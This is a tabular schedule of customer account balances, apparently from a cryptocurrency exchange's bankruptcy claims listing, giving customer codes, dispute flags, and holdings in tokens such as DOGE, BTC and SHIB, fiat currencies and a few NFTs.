| 07367886 | | DOGE[249.94641717], TRX[1], USD[0.00] | | |
| 07367888 | | BTC[.00020109], USD[0.00] | | |
| 07367889 | | USD[0.00] | | |
| 07367890 | | USD[10.00] | | |
| 07367891 | | DOGE[26.65759171], USD[0.00] | | |
| 07367893 | | USD[10.00] | | |
| 07367894 | | BRZ[1], BTC[.00000013], DOGE[1], ETH[.00000373], SHIB[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07367895 | | USD[10.00] | | |
| 07367896 | | USD[0.01] | | |
| 07367897 | | CUSDT[2], DOGE[559.76906183], USD[0.01] | | |
| 07367898 | | SOL[.04714053], USD[0.00] | | |
| 07367899 | | DOGE[247.7670952], USD[0.00] | | |
| 07367900 | | CUSDT[2], DOGE[49.50311152], USD[0.00] | | |
| 07367902 | | USD[10.00] | | |
| 07367903 | | USD[0.01] | Yes | |
| 07367904 | | USD[10.00] | | |
| 07367905 | | CUSDT[3], DOGE[126.85339764], TRX[3], USD[0.00] | | |
| 07367906 | | USD[0.00] | | |
| 07367910 | | USD[10.00] | | |
| 07367911 | | USD[10.00] | | |
| 07367914 | | USD[0.28] | | |
| 07367916 | | USD[10.00] | | |
| 07367917 | | BTC[0.03179788], DAI[.00039953], NFT (304063205536906366/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #67)[1], SHIB[23], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07367918 | | CUSDT[1], DOGE[1.00003822], USD[0.01] | | |
| 07367919 | | DOGE[17.09802349], TRX[1.35298039], USD[0.00] | | |
| 07367922 | | USD[10.00] | | |
| 07367924 | | DOGE[7506.32103929], SHIB[26391828.77903334], USD[0.00], USDT[0] | Yes | |
| 07367925 | | USD[10.00] | | |
| 07367926 | | USD[10.00] | | |
| 07367927 | | USD[10.00] | | |
| 07367928 | | BRZ[1], BTC[.00120833], CUSDT[1], DOGE[2110.33508484], TRX[1990.66181744], USD[0.00] | | |
| 07367929 | | CUSDT[48.25471377], USD[0.00] | | |
| 07367930 | | USD[10.00] | | |
| 07367931 | | CUSDT[3], USD[3.79] | | |
| 07367932 | | USD[0.00] | | |
| 07367933 | | USD[10.00] | | |
| 07367934 | | USD[10.00] | | |
| 07367935 | | BRZ[0.00341762], BTC[0], CUSDT[3], DOGE[0.00004467], ETH[0.10594729], ETHW[0.10487017], TRX[1], USD[0.00] | Yes | |
| 07367936 | | USD[10.00] | | |
| 07367937 | | USD[0.00] | | |
| 07367938 | | BCH[.05328702], BRZ[1], BTC[.00044073], CUSDT[520.98730088], DOGE[217.50269854], ETH[.30106255], ETHW[.30106255], SHIB[364361.05929115], TRX[3], USD[0.00] | | |
| 07367939 | | USD[10.00] | | |
| 07367940 | | AVAX[3.08613452], BRZ[1], DOGE[21263.74153657], LINK[5.55870056], SHIB[10981982.12098816], SOL[2.06945719], TRX[1], USD[0.00] | Yes | |
| 07367941 | | BTC[0], USD[0.11] | | |
| 07367942 | | BF_POINT[200], DOGE[0], ETH[0], ETHW[0], SHIB[38934.66024257], USD[0.00] | Yes | |
| 07367943 | | USD[10.00] | | |
| 07367944 | | DOGE[579.38602159], NFT (352656527960591625/Sigma Shark #5752)[1], NFT (542522306522938992/Holy Temple #01)[1], SHIB[17626096.81181283], USD[0.00] | Yes | |
| 07367945 | | BAT[1], CUSDT[1], DOGE[4.02692404], TRX[3], USD[0.00], USDT[0] | | |
| 07367946 | | CUSDT[1], DOGE[31.48494954], USD[0.00] | | |
| 07367947 | | USD[10.00] | | |
| 07367948 | | DOGE[5055.83890012], GRT[1], USD[0.00], USDT[2] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07367950 | | USD[10.00] | | |
| 07367951 | | CUSDT[14], USD[99.09] | | |
| 07367952 | | USD[10.00] | | |
| 07367953 | | BRZ[2], CUSDT[3.10820585], DOGE[1560.51872266], TRX[1], USD[0.01] | | |
| 07367954 | | BRZ[0], DOGE[0], TRX[0], USD[0.00] | Yes | |
| 07367955 | | AUD[0.00], BAT[129.55120892], BCH[.1888224], BRZ[1.00116002], BTC[0.00492462], CAD[0.00], CUSDT[621.29825498], DOGE[883.10704518], ETH[.08777658], ETHW[.08674843], EUR[45.86], GBP[75.94], GRT[28.69512887], LTC[.32849571], SGD[0.00], SHIB[191365.45365489], SOL[2.06005931], TRX[1326.48101774], USD[1.03] | Yes | |
| 07367956 | | DOGE[0], TRX[16.23907058], USD[0.00] | | |
| 07367957 | | BRZ[2], CUSDT[1], DOGE[.00000125], USD[0.60] | | |
| 07367958 | | USD[10.00] | | |
| 07367959 | | BRZ[2], BTC[0], CUSDT[6], DOGE[0], TRX[2], USD[1.22], USDT[1] | | |
| 07367960 | | USD[10.00] | | |
| 07367961 | | USD[10.00] | | |
| 07367962 | | BRZ[1], BTC[.00097574], CUSDT[3], DOGE[456.7156465], ETH[.02146679], ETHW[.02120116], SHIB[1430575.58184508], TRX[1], USD[0.00] | Yes | |
| 07367963 | | USD[10.00] | | |
| 07367965 | | BCH[0], BTC[0.00423202], DOGE[1], ETH[0], GRT[0], LTC[0], SHIB[1], SOL[0], TRX[0], USD[0.00] | | |
| 07367966 | | USD[10.00] | | |
| 07367968 | | USD[10.00] | | |
| 07367970 | | DOGE[0.64700000], SUSHI[0], USD[0.38], USDT[1.94931921] | | |
| 07367973 | | USD[10.00] | | |
| 07367975 | | USD[10.00] | | |
| 07367976 | | BRZ[1], BTC[.02429082], CUSDT[3], DOGE[2.00003378], USD[0.00] | Yes | |
| 07367977 | | CUSDT[1], DOGE[2678.78697228], LINK[4.00666791], USD[10.00] | | |
| 07367978 | | USD[10.00] | | |
| 07367980 | | CUSDT[1], USD[0.00] | | |
| 07367981 | Contingent, Disputed | BRZ[56.08589626], CUSDT[5], DOGE[1913.05391012], SHIB[2329111.31770547], TRX[2012.66666709], USD[1.00] | | |
| 07367982 | | USD[0.00] | | |
| 07367983 | | USD[10.00] | | |
| 07367984 | | BTC[0.00006561], DOGE[.801], SUSHI[.4995] | | |
| 07367985 | | USD[10.00] | | |
| 07367986 | | USD[10.00] | | |
| 07367989 | | DOGE[1.62788378], USD[0.00] | | |
| 07367992 | | DOGE[1], USD[10.00] | | |
| 07367993 | | USD[10.00] | | |
| 07367994 | | BTC[0], SUSHI[0], TRX[0], USD[1.74] | | |
| 07367995 | | USD[10.00] | | |
| 07367996 | | DOGE[.55876458], USD[0.10] | | |
| 07367997 | | BCH[0], BRZ[0], USD[0.00] | | |
| 07367998 | | BRZ[0], BTC[0], DOGE[0], LTC[0], USD[0.00] | | |
| 07367999 | | DOGE[3], USD[0.00] | | |
| 07368000 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07368001 | | USD[10.00] | | |
| 07368003 | | BTC[.01421996], DOGE[1645.76465862], LINK[1.86478974], TRX[1], USD[0.00] | | |
| 07368004 | | USD[0.29] | | |
| 07368005 | | USD[10.00] | | |
| 07368006 | | CUSDT[3], DOGE[1], TRX[2], USD[0.00] | | |
| 07368008 | | USD[10.00] | | |
| 07368009 | | USD[10.00] | | |
| 07368010 | | USD[10.00] | | |
| 07368011 | | DOGE[1], USD[10.36] | | |
| 07368012 | | BAT[1], BRZ[2], CUSDT[1], DOGE[8035.42560719], TRX[2], USD[4.05] | | |
| 07368013 | | USD[10.00] | | |
| 07368014 | | USD[10.00] | | |
| 07368015 | | CUSDT[1], ETHW[.49902805], SHIB[1], TRX[2], USD[0.20] | Yes | |
| 07368017 | | BRZ[2], CUSDT[4], DOGE[2219.84345156], LTC[11.11647343], TRX[6], USD[0.00] | Yes | |
| 07368019 | | CUSDT[2], GRT[48.83936112], USD[0.00], USDT[0.00000005] | Yes | |
| 07368020 | | USD[10.00] | | |
| 07368021 | | USD[10.00] | | |
| 07368022 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368023 | | USD[10.00] | | |
| 07368025 | | USD[10.00] | | |
| 07368026 | | BRZ[1], CUSDT[8], DOGE[390.18769863], TRX[2], USD[0.00] | | |
| 07368027 | | USD[0.01] | | |
| 07368028 | | CUSDT[2], DOGE[.00003859], USD[0.01], USDT[0.00009986] | | |
| 07368029 | | DOGE[85.95052687], USD[10.00] | | |
| 07368030 | | BAT[.55892061], BCH[.00001289], CUSDT[4], DOGE[1], ETH[0.34517865], ETHW[0.34517865], GRT[2], LINK[.81398506], TRX[4], USD[0.00] | | |
| 07368031 | | USD[10.00] | | |
| 07368032 | | USD[10.00] | | |
| 07368033 | | USD[10.00] | | |
| 07368034 | | BTC[.00257864], CUSDT[14], DOGE[304.16997328], ETH[.05050604], ETHW[.05050604], TRX[1], USD[100.00] | | |
| 07368035 | | SHIB[.21779638], USD[0.00] | Yes | |
| 07368036 | | DOGE[1], GRT[4.19169712], USD[0.00] | | |
| 07368040 | | USD[10.00] | | |
| 07368041 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07368042 | | USD[0.00] | | |
| 07368043 | | DOGE[.02775866], USD[0.66], USDT[0] | Yes | |
| 07368044 | | CUSDT[3], TRX[3], USD[0.00] | | |
| 07368045 | | BTC[.00168211], CUSDT[1], DOGE[2], LINK[3.33012921], USD[0.00] | Yes | |
| 07368046 | | USD[10.00] | | |
| 07368047 | | TRX[2717.20301989], USD[0.00] | | |
| 07368048 | | CUSDT[3], DOGE[1.00002205], TRX[11271.98843164], USD[82.93] | | |
| 07368049 | | CUSDT[5], DOGE[297.92471198], TRX[3], USD[0.01] | | |
| 07368050 | | BAT[174.12880843], BRZ[2], CUSDT[3], DOGE[1666.11114467], GRT[139.07472108], LINK[7.91172758], MKR[.20231703], TRX[1842.0156528], USD[9.32], USDT[0.00000265] | Yes | |
| 07368052 | | USD[10.00] | | |
| 07368053 | Contingent, Disputed | USD[52.89] | | |
| 07368054 | | USD[10.00] | | |
| 07368055 | | USD[10.00] | | |
| 07368056 | | USD[15.00] | | |
| 07368057 | | BRZ[1], BTC[.00021364], CUSDT[4], DOGE[10357.98352014], ETH[.50577755], SHIB[12121536.52629546], TRX[2], USD[130.57], USDT[1.0115548] | Yes | |
| 07368058 | | ETH[.00561875], ETHW[.00561875], USD[0.00] | | |
| 07368059 | | BAT[2.0416317], BRZ[6.90017584], DAI[1.25890123], DOGE[5.88646906], EUR[0.00], GRT[1.83828716], MATIC[1.3644122], SOL[0.00000064], USD[0.00] | Yes | |
| 07368060 | | DOGE[0], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07368062 | | CUSDT[3], USD[0.00], USDT[0] | Yes | |
| 07368063 | | TRX[.000002], USD[1.12], USDT[0.00013080] | | |
| 07368065 | | BRZ[1], CUSDT[2], DOGE[0], GRT[1], USD[0.00] | | |
| 07368067 | | BTC[.0482449], DOGE[2], ETH[.13452932], ETHW[.13346108], TRX[1], USD[0.00] | Yes | |
| 07368068 | | BAT[15.75543325], CUSDT[4], DOGE[95.91113379], GRT[1], MATIC[9.71959916], SHIB[2489851.22864211], SOL[22.16413013], TRX[4], UNI[9.50697845], USD[0.88] | Yes | |
| 07368069 | | MATIC[.00004609], USD[0.00] | Yes | |
| 07368070 | | BRZ[1], LTC[.05618098], TRX[1], USD[0.00] | | |
| 07368071 | | USD[10.00] | | |
| 07368072 | | BTC[0], CUSDT[1], DOGE[6], ETH[0], GRT[.00000312], SOL[0], TRX[1], USD[0.00], USDT[0.91164022] | | |
| 07368073 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07368074 | | DOGE[1.00007897], USD[0.01] | | |
| 07368075 | | CUSDT[3], USD[0.00] | Yes | |
| 07368076 | | DOGE[1.00004655], TRX[.009475], USD[0.01] | | |
| 07368077 | | BCH[0], BRZ[4], BTC[.00024612], CUSDT[9], DOGE[1], GRT[1], SUSHI[2], TRX[1], USD[0.00] | | |
| 07368078 | | DOGE[29.17206145], USD[0.00] | | |
| 07368079 | | CUSDT[2], DOGE[1108.97720399], USD[0.11] | Yes | |
| 07368080 | | BTC[.00037994], CUSDT[7], DOGE[69.66938402], SHIB[608198.51599562], TRX[1], USD[2.01] | | |
| 07368081 | | USD[10.00] | | |
| 07368082 | | BRZ[3], CUSDT[2], DOGE[1], LINK[70.21248565], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07368083 | | DOGE[175.80665787], USD[100.00] | | |
| 07368084 | | BTC[.0004709], DOGE[1], ETH[.00579466], ETHW[.00579466], USD[0.00] | | |
| 07368085 | | USD[10.00] | | |
| 07368086 | | USD[10.00] | | |
| 07368088 | | USD[10.00] | | |
| 07368089 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368090 | | CUSDT[1], USD[0.00] | | |
| 07368091 | | BRZ[1], BTC[0], CUSDT[20], DOGE[1], ETH[0], GRT[2.0716079], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07368092 | | USD[10.00] | | |
| 07368093 | | DOGE[136.63937386], USD[0.00] | Yes | |
| 07368095 | | BCH[.046133], CUSDT[1], TRX[1], USD[0.01] | | |
| 07368097 | | USD[10.00] | | |
| 07368098 | | BAT[10.62335762], CUSDT[2], DOGE[.0007387], ETH[.00044213], ETHW[.00044213], TRX[.89900146], USD[0.00] | | |
| 07368100 | | USD[0.00] | | |
| 07368101 | | USD[0.01] | | |
| 07368102 | | USD[0.00] | | |
| 07368103 | | BRZ[1], CUSDT[1], USD[0.10], USDT[1] | | |
| 07368104 | | USD[10.00] | | |
| 07368105 | | USD[0.01] | | |
| 07368106 | | BRZ[1], CUSDT[3], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07368107 | | BRZ[1], CUSDT[3], TRX[1], USD[10.00] | | |
| 07368108 | | USD[10.00] | | |
| 07368109 | | USD[10.00] | | |
| 07368111 | | USD[0.00] | | |
| 07368112 | | BRZ[1], CUSDT[15], TRX[2], USD[0.00] | Yes | |
| 07368113 | | USD[0.01] | | |
| 07368114 | | USD[10.00] | | |
| 07368115 | | BTC[0], CUSDT[2], USD[0.00], USDT[0.00000001] | | |
| 07368116 | | USD[10.00] | | |
| 07368117 | | BRZ[2], CUSDT[14], DOGE[2], SHIB[5], USD[0.21] | Yes | |
| 07368118 | | DOGE[8.93794909], USD[5.00] | | |
| 07368120 | | GRT[0], LINK[0], USD[0.01] | | |
| 07368121 | | DOGE[642.84378759], USD[0.00] | | |
| 07368122 | | BRZ[1], CUSDT[10], LINK[.00001231], TRX[2], USD[0.00], USDT[1.08694328] | Yes | |
| 07368123 | | BTC[.00013794], CUSDT[3], TRX[0.01200224], USD[0.00], USDT[0] | Yes | |
| 07368124 | | USD[10.00] | | |
| 07368125 | | USD[11.09] | Yes | |
| 07368126 | | BRZ[4], CUSDT[9], DOGE[1], TRX[1], USD[0.00] | | |
| 07368127 | | USD[10.00] | | |
| 07368128 | | USD[10.00] | | |
| 07368129 | | USD[10.00] | | |
| 07368130 | | BAT[0], BTC[0], ETH[0], GRT[0], LINK[0], TRX[0], USD[0.00], YFI[0] | | |
| 07368131 | | CUSDT[1], DOGE[8393.8749335], USD[20.00] | | |
| 07368132 | | BTC[.00096534], USD[0.00] | Yes | |
| 07368133 | | CUSDT[4], USD[39.78] | | |
| 07368134 | | CUSDT[1], DOGE[853.00753771], USD[55.00] | | |
| 07368136 | | USD[10.00] | | |
| 07368137 | | TRX[2], USD[0.01] | | |
| 07368138 | | TRX[.11239409], USD[0.00], USDT[0] | | |
| 07368139 | | BTC[.00052734], CUSDT[2], DOGE[509.50579489], GRT[11.98345337], USD[0.00] | | |
| 07368140 | | USD[10.00] | | |
| 07368141 | | CUSDT[2], DOGE[.02252831], TRX[1], USD[0.00], USDT[1] | | |
| 07368142 | | USD[10.00] | | |
| 07368143 | | CUSDT[2], DOGE[1101.39930396], SOL[.1616453], USD[0.00] | | |
| 07368144 | | USD[10.00] | | |
| 07368145 | | USD[10.00] | | |
| 07368147 | | USD[10.00] | | |
| 07368148 | | BRZ[1011.45134149], DOGE[247.88325019], TRX[13453.77051881], USD[0.00] | | |
| 07368149 | | BAT[0.00007897], BRZ[1.00004121], CUSDT[7.65569537], DOGE[2085.84605599], GRT[1.01032942], USD[0.00], USDT[1.10515011] | Yes | |
| 07368150 | | USD[10.00] | | |
| 07368151 | | USD[10.00] | | |
| 07368153 | | BRZ[0], DOGE[1.42003254], GRT[0], LINK[0], TRX[0], USD[0.00], USDT[0] | | |
| 07368154 | | DOGE[96353.19283365], TRX[2], USD[0.00], USDT[1.09331371] | Yes | |
| 07368155 | | USD[10.00] | | |

| Customer Code | Contingent, or Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368156 | | DOGE[.06463628], USD[0.00] | Yes | |
| 07368157 | | BCH[.98989917], CUSDT[3], DOGE[7.00000562], ETH[.87846162], ETHW[.87846162], LINK[19.68190935], LTC[2.62321765], SOL[.88516173], SUSHI[.00001599], TRX[6], USD[0.53], USDT[1] | | |
| 07368158 | | DOGE[639.02495781], TRX[1], USD[0.00] | | |
| 07368159 | | USD[10.00] | | |
| 07368160 | | DOGE[2], ETH[0], SHIB[2], SOL[0], USD[0.00] | Yes | |
| 07368161 | | BRZ[1], CUSDT[10], DOGE[1], ETH[0], ETHW[0.81747119], LINK[119.31728257], SUSHI[1.06528434], UNI[1.06262195], USD[0.00] | Yes | |
| 07368162 | | CUSDT[4], DOGE[378.72477615], USD[0.00] | Yes | |
| 07368163 | | DAI[.00008278], USD[0.00] | Yes | |
| 07368164 | | BRZ[1], DOGE[3541.72172722], USD[0.00] | | |
| 07368165 | | BRZ[1], DOGE[16326.17996648], TRX[2844.32475805], USD[0.00] | Yes | |
| 07368167 | | DOGE[1], USD[12.47] | | |
| 07368168 | | USD[10.00] | | |
| 07368169 | | BAT[35.67057504], BRZ[4], CUSDT[83.32139523], DOGE[3.06584822], GRT[2.00056251], NFT (531123964326450263/Saudi Arabia Ticket Stub #488)[1], SHIB[321335541.26736632], TRX[13.02760293], USD[0.01], USDT[3.1986756] | Yes | |
| 07368170 | | ETH[0], SHIB[480730.9701015], USD[0.00] | Yes | |
| 07368171 | | USD[10.00] | | |
| 07368172 | | BTC[.00018464], USD[0.00] | | |
| 07368174 | | DOGE[4158.68193595], USD[219.46] | Yes | |
| 07368175 | | AAVE[.00312965], BTC[.00168337], SOL[.00000001] | | |
| 07368176 | | CUSDT[1], DOGE[15437.90284896], TRX[2], USD[0.26] | | |
| 07368177 | | CUSDT[1], GRT[4.90686093], USD[0.01] | | |
| 07368178 | | CUSDT[3], USD[0.00] | | |
| 07368179 | | BTC[.00099154], CUSDT[1], DOGE[5], ETH[.00954547], ETHW[.00942226], LINK[.68346883], SHIB[301992.9391632], TRX[2], USD[22.74] | Yes | |
| 07368180 | | DOGE[198.65345751], USD[0.00] | Yes | |
| 07368181 | | USD[10.00] | | |
| 07368182 | | USD[10.00] | | |
| 07368183 | | USD[10.00] | | |
| 07368184 | | USD[10.00] | | |
| 07368185 | | USD[10.00] | | |
| 07368187 | | DOGE[1.00003547], TRX[0], USD[0.00] | | |
| 07368188 | | BTC[.00238319], CUSDT[3], DOGE[18.71047024], TRX[1], USD[41.05] | Yes | |
| 07368189 | | DOGE[1530.24584278], USD[0.00] | | |
| 07368191 | | USD[10.00] | | |
| 07368192 | | USD[10.00] | | |
| 07368193 | | BAT[4.43410063], BRZ[171.49590779], CUSDT[9206.41896096], DOGE[5599.47775125], GRT[1.20239624], LINK[.03774554], SHIB[7543299.71481864], TRX[17.23619463], USD[0.40] | Yes | |
| 07368195 | | USD[10.00] | | |
| 07368196 | | USD[10.00] | | |
| 07368199 | | SOL[.14096886], USD[0.00] | Yes | |
| 07368200 | | USD[10.00] | | |
| 07368201 | | BRZ[1], CUSDT[8], DOGE[1184.00592956], ETH[.00574784], ETHW[0.00574783], USD[0.00], USDT[0] | | |
| 07368202 | | BRZ[1], BTC[.00521354], CUSDT[3], DOGE[1193.59859433], ETH[.07293977], ETHW[.07293977], USD[50.00], USDT[1] | | |
| 07368203 | | CUSDT[2], DOGE[83.26259417], SHIB[368141.72089216], USD[0.00] | Yes | |
| 07368204 | | DOGE[432.00626734], GRT[5.08649487], SOL[1.18901236], USD[0.00] | | |
| 07368205 | | BTC[0], CUSDT[2], DOGE[0], ETH[0], USD[1.72] | | |
| 07368206 | | USD[10.00] | | |
| 07368207 | | USD[10.00] | | |
| 07368208 | | CUSDT[2], USD[0.00] | | |
| 07368209 | | USD[10.00] | | |
| 07368210 | | DOGE[410.33508371], TRX[1], USD[0.00] | | |
| 07368211 | | USD[10.00] | | |
| 07368212 | | USD[0.00], USDT[0] | | |
| 07368213 | | USD[10.00] | | |
| 07368214 | | TRX[1], USD[0.00] | | |
| 07368215 | | BTC[.00021404], DOGE[242.83624324], USD[0.00] | | |
| 07368217 | | BTC[.00469056], DOGE[0] | | |
| 07368218 | | USD[10.00] | | |
| 07368220 | | DOGE[1], USD[0.01] | | |
| 07368221 | | CUSDT[470.66966708], DOGE[1.00000127], SHIB[3805455.2962566], USD[0.00] | | |
| 07368222 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368223 | | BAT[1], SHIB[2], USD[1214.28] | | |
| 07368224 | | USD[10.00] | | |
| 07368225 | | DOGE[.00001261], TRX[1], USD[0.00] | | |
| 07368226 | | USD[10.00] | | |
| 07368227 | | TRX[1], USD[0.97] | | |
| 07368228 | | BAT[1], BRZ[6], BTC[0], CUSDT[27], DAI[0], DOGE[5.00033392], ETH[0], GRT[0.00000036], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07368229 | | USD[10.00] | | |
| 07368333 | | CUSDT[3], DOGE[1.00000006], LINK[.00288087], NFT [57583628284930 7663/Space Bums #2221][1], SHIB[107857.69950154], SOL[.0074187], TRX[.00143767], USD[0.28], USDT[0.00000001] | Yes | |
| 07368236 | | CUSDT[1], DOGE[.00000431], USD[0.00] | Yes | |
| 07368237 | | USD[10.00] | | |
| 07368238 | | BTC[.00041866], CUSDT[21], DOGE[22.44523755], ETH[0.00436950], ETHW[0.00436950], SUSHI[1.19100669], USD[0.08] | | |
| 07368239 | | BRZ[2], TRX[3], USD[0.00], USDT[0.00000001] | Yes | |
| 07368240 | | DOGE[36.27005303], USD[0.00] | | |
| 07368241 | | BAT[1], BTC[0], DOGE[2], TRX[5], USD[0.00], USDT[0] | Yes | |
| 07368242 | | USD[10.00] | | |
| 07368243 | | BTC[.00013861], CUSDT[1], DOGE[1], TRX[2], USD[0.00], USDT[0.00000001] | Yes | |
| 07368244 | | CUSDT[3], USD[0.00] | | |
| 07368245 | | BTC[0], DOGE[0], ETH[0], SOL[0], SUSHI[0], USD[0.00], USDT[1.00000016] | | |
| 07368247 | | USD[10.00] | | |
| 07368248 | | USD[60.00] | | |
| 07368249 | | USD[10.00] | | |
| 07368250 | | USD[10.00] | | |
| 07368252 | | USD[10.00] | | |
| 07368253 | | USD[10.00] | | |
| 07368254 | | USD[10.00] | | |
| 07368255 | | DOGE[3], TRX[72.11637846], USD[0.00] | | |
| 07368257 | | USD[30.00] | | |
| 07368258 | | BTC[.00189421], CUSDT[2], DOGE[768.13931478], ETH[.01336272], ETHW[.01336272], SHIB[23.80094466], USD[0.00] | | |
| 07368260 | | USD[10.00] | | |
| 07368261 | | BAT[2], CUSDT[7], DOGE[.01181948], GRT[2], SUSHI[.00003778], TRX[6], USD[0.00], USDT[.1094815] | | |
| 07368262 | | BRZ[1], CUSDT[4], GRT[.00007792], TRX[2], USD[0.01] | | |
| 07368263 | | USD[10.00] | | |
| 07368264 | | USD[10.00] | | |
| 07368265 | | USD[10.00] | | |
| 07368266 | | BCH[0], CUSDT[2.84937604], USD[0.00] | | |
| 07368267 | | USD[10.00] | | |
| 07368268 | | CUSDT[6], DOGE[6265.87332915], TRX[2], USD[0.00] | Yes | |
| 07368269 | | USD[0.00] | | |
| 07368270 | | BCH[.08821297], BRZ[66.96341056], BTC[.00239623], CUSDT[41], DOGE[240.74235202], ETH[.01459371], ETHW[.01441587], LTC[1.23497799], PAXG[.01533863], SOL[.2065879], TRX[533.06755199], UNI[1.15307615], USD[0.00], USDT[36.77897611] | Yes | |
| 07368271 | | DOGE[26.21652749], USD[0.00] | | |
| 07368272 | | USD[10.00] | | |
| 07368273 | | USD[0.01], USDT[0] | Yes | |
| 07368275 | | USD[10.00] | | |
| 07368276 | | USD[10.00] | | |
| 07368277 | | SOL[1.28876998], USD[0.00] | | |
| 07368278 | | BTC[.00022986], DOGE[164.30268577], ETH[.00616676], ETHW[.00616676], TRX[1], USD[2.19] | | |
| 07368279 | | DOGE[2335.20226607], KSHIB[9.42168471], SHIB[22952309.3338795], TRX[4539.5018043], USD[0.17] | Yes | |
| 07368280 | | USD[10.00] | | |
| 07368281 | | USD[10.00] | | |
| 07368283 | | BRZ[2], CUSDT[1], TRX[2], USD[0.00] | | |
| 07368285 | | BF_POINT[100], USD[10.00] | | |
| 07368286 | | CUSDT[1], TRX[1], USD[0.70] | | |
| 07368288 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07368289 | | BAT[2.01233147], BCH[9.68066746], BRZ[6.22943441], BTC[.50584043], CUSDT[14], DOGE[35749.93875555], ETH[9.48159802], ETHW[8.31053891], GRT[4.13140912], KSHIB[26276.42598741], SHIB[41376305.71796755], TRX[16118.55228698], UNI[1.08237109], USD[0.03], USDT[1.08237109] | Yes | |
| 07368290 | | BTC[0], CUSDT[3], DOGE[2.00019575], ETH[0], ETHW[0], TRX[.0000961], USD[0.00] | | |
| 07368291 | | CUSDT[1], DOGE[.00000675], TRX[2], USD[0.05] | | |
| 07368292 | | USD[10.00] | | |
| 07368293 | | CUSDT[5], DOGE[0], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07368294 | | GRT[4.40199471], SHIB[1], SOL[1.31797254], USD[0.00] | Yes | |
| 07368295 | | BRZ[11.5330109], CUSDT[141.51003146], DOGE[154.28703349], USD[0.00] | | |
| 07368296 | | BTC[.00000435], CUSDT[3], DOGE[.54057214], ETH[.00053826], ETHW[.00053826], TRX[30.08772072], USD[0.65], USDT[1] | | |
| 07368297 | | USD[10.00] | | |
| 07368299 | | USD[0.74] | | |
| 07368300 | | BTC[0], CUSDT[33], DOGE[47.44252002], LINK[0], LTC[0], TRX[1], USD[0.00] | | |
| 07368302 | | BTC[.02736839], CUSDT[1], DOGE[1], ETH[.16702947], ETHW[.16702947], TRX[1], USD[1.96] | | |
| 07368303 | | DOGE[569.30495092], USD[10.00] | | |
| 07368304 | | ETH[.00000431], ETHW[.00000431], USD[0.00] | | |
| 07368305 | | BRZ[1], USD[0.00] | | |
| 07368307 | | BAT[40.19240239], BCH[.01862836], BRZ[1], CUSDT[2], DOGE[959.71169815], GRT[8.78630014], LINK[.00000244], LTC[.02847159], NFT [509225820293446889/CatFamilya #65)[1], SHIB[632557.44077728], SUSHI[2.31837015], TRX[1780.17424848], UNI[.25369413], USD[0.00] | Yes | |
| 07368308 | | BTC[0], ETHW[.44955], USD[0.00] | | |
| 07368309 | | DOGE[1], USD[0.01] | | |
| 07368310 | | USD[10.00] | | |
| 07368312 | | BTC[.0001736], USD[0.00] | | |
| 07368313 | | USD[0.00] | | |
| 07368314 | | DOGE[1], ETH[.00281142], ETHW[.00281142], USD[0.00] | | |
| 07368315 | | USD[0.00] | | |
| 07368316 | | BRZ[1], DOGE[1.0000136], GRT[1], SOL[.00004973], TRX[2], USD[0.01] | | |
| 07368318 | Contingent, Disputed | USD[16.75] | | |
| 07368319 | | BRZ[1], BTC[.01319278], ETH[.65954038], ETHW[0.65926345], LTC[1.62606862], MATIC[3460.29260059], SHIB[53452723.02156965], USD[0.00] | Yes | |
| 07368320 | | BTC[0], ETH[0], SOL[0], UNI[0], USD[0.01] | | |
| 07368321 | | USD[10.00] | | |
| 07368322 | | BRZ[1], CUSDT[3], DOGE[609.43601824], TRX[528.96106629], USD[0.00] | | |
| 07368323 | | CUSDT[3], USD[0.00] | | |
| 07368325 | | USD[10.00] | | |
| 07368327 | | CUSDT[2], DOGE[.00001095], TRX[1], USD[0.16], USDT[1] | | |
| 07368328 | | TRX[76.41716005], USD[0.00] | | |
| 07368329 | | CUSDT[2], USD[0.00], USDT[1] | | |
| 07368330 | | AAVE[.05252424], CUSDT[3], DOGE[24.13197664], ETH[.04510145], ETHW[.04510145], SOL[7.20950477], USD[0.00] | | |
| 07368331 | | USD[10.00] | | |
| 07368332 | | CUSDT[2], DOGE[91.63392539], TRX[2], USD[0.58] | | |
| 07368333 | | DOGE[.00609661], USD[0.00] | | |
| 07368334 | | CUSDT[1], USD[0.00] | | |
| 07368335 | | CUSDT[5], DOGE[51.00000944], USD[25.61] | | |
| 07368336 | | DOGE[137.51263569], USD[0.00] | | |
| 07368337 | | USD[10.00] | | |
| 07368338 | | TRX[1], USD[0.00] | | |
| 07368339 | | USD[10.00] | | |
| 07368340 | | USD[10.00] | | |
| 07368341 | | CUSDT[3], ETH[.03005424], ETHW[.03005424], USD[25.00] | | |
| 07368342 | | BTC[0], GRT[0], USD[0.00] | | |
